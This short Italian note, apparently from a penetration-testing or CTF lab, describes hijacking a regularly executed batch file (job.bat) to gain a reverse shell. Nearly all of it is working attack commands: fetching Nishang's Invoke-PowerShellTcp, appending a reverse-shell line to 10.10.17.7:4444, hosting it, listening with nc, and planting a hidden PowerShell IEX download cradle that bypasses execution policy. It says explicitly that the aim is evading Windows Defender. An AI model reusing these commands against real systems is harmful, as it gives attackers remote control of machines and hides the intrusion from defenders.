tags: Esecuzione_Comando_In_Wevtutil Malware_Fileless Fileless_Reverse_Shell
Quando troviamo uno script che viene eseguito regolarmente tramite wevtutil.exe possiamo modificarlo nel seguente modo:
Per prima cosa scarica questo file sulla macchina attaccante:
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1Ora modifica questo file e aggiungi in fondo questa riga (che è la reverse shell):
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.7 -Port 4444Creiamo un server per permettere alla vittima di scaricare il nostro file
python3 -m http.serverE un altro dove ricevere la reverse shell:
nc -lvnp 4444Ora dalla macchina vittima lanciamo il seguente comando:
echo powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.17.7:8000/PowerShellTcp.ps1')" > C:\Log-Management\job.batDove job.bat è il file che viene eseguito regolarmente.
In questo modo carichiamo ed eseguiamo il file direttamente in memoria senza lasciare file sulla macchina vittima evitando così l’individuazione da parte di Windows Defender.